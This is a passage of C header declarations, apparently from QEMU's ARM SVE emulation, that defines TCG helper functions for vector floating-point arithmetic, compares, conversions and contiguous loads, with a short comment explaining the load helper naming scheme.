DEF_HELPER_FLAGS_4(sve_fminv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fminv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fadda_h, TCG_CALL_NO_RWG, i64, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fadda_s, TCG_CALL_NO_RWG, i64, i64, ptr, ptr, ptr, i32) 
DEF_HELPER_FLAGS_5(sve_fadda_d, TCG_CALL_NO_RWG, i64, i64, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmge0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmge0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmge0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmgt0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmgt0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmgt0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmlt0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmlt0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmlt0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmle0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmle0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmle0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmeq0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmeq0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmeq0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmne0_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmne0_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcmne0_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsub_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsub_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsub_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmul_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmul_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmul_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fdiv_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fdiv_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fdiv_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmin_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmin_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmin_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmax_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmax_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmax_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnum_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnum_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnum_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnum_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnum_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnum_d, TCG_CALL_NO_RWG, void, ptr, ptr, 
ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fabd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fabd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fabd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fscalbn_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fscalbn_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fscalbn_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmulx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmulx_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmulx_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadds_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadds_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fadds_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubs_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubs_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubs_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmuls_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmuls_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmuls_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubrs_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubrs_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fsubrs_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnms_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnms_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxnms_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnms_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnms_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fminnms_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxs_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxs_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmaxs_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmins_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmins_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_6(sve_fmins_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_sh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_dh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_hs, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_ds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_hd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvt_sd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_hh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_hs, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_ss, TCG_CALL_NO_RWG, void, ptr, ptr, 
ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_ds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_hd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_sd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzs_dd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_hh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_hs, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_ss, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_ds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_hd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_sd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fcvtzu_dd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frint_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frint_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frint_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frintx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frintx_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frintx_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frecpx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frecpx_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_frecpx_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fsqrt_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fsqrt_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_fsqrt_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_hh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_sh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_dh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_ss, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_sd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_ds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_scvt_dd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_hh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_sh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_dh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_ss, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_sd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_ds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ucvt_dd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmge_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmge_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmge_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmgt_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmgt_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmgt_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmeq_h, 
TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmeq_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmeq_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmne_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmne_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmne_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmuo_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmuo_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcmuo_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facge_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facge_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facge_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facgt_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facgt_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_facgt_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcadd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcadd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_fcadd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmla_zpzzz_h, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmla_zpzzz_s, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmla_zpzzz_d, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmls_zpzzz_h, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmls_zpzzz_s, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fmls_zpzzz_d, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmla_zpzzz_h, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmla_zpzzz_s, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmla_zpzzz_d, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmls_zpzzz_h, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmls_zpzzz_s, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fnmls_zpzzz_d, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fcmla_zpzzz_h, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fcmla_zpzzz_s, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_3(sve_fcmla_zpzzz_d, TCG_CALL_NO_RWG, void, env, ptr, i32) DEF_HELPER_FLAGS_5(sve_ftmad_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ftmad_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_ftmad_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_ld1bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) 
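/*
 * Reader's note (added annotation) on the contiguous load helpers that
 * start at sve_ld1bb_r above and continue below, a naming sketch
 * inferred from the declarations: ld<N> is the number of interleaved
 * registers (LD1..LD4); the letter pair that follows is
 * <memory element size><register element size>, with a trailing u or s
 * for zero- or sign-extension when the two differ (so "bsu" loads
 * bytes zero-extended into 32-bit elements, while "bss" sign-extends);
 * _le/_be select the memory endianness and _r marks the scalar-base
 * contiguous form. The ldff (first-fault) and ldnf (no-fault) variants
 * further on follow the same scheme. These use TCG_CALL_NO_WG rather
 * than TCG_CALL_NO_RWG because a memory access can fault and must be
 * able to read global CPU state; the signature is
 * (env, predicate, base address, descriptor).
 */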
DEF_HELPER_FLAGS_4(sve_ld2hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4ss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4dd_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld2dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld3dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld4dd_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bhu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bsu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bdu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bhs_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bss_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1bds_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hsu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hdu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hsu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1hds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1sdu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1sds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1sdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ld1sds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bb_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bhu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bsu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bdu_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bhs_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bss_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1bds_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hh_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hsu_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hdu_le_r, TCG_CALL_NO_WG, 
void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hds_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hh_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hsu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hdu_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hss_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1hds_be_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1ss_le_r, TCG_CALL_NO_WG, void, env, ptr, tl, i32) DEF_HELPER_FLAGS_4(sve_ldff1sdu_le_r, TCG_CALL_NO_WG, void, env, ptr, 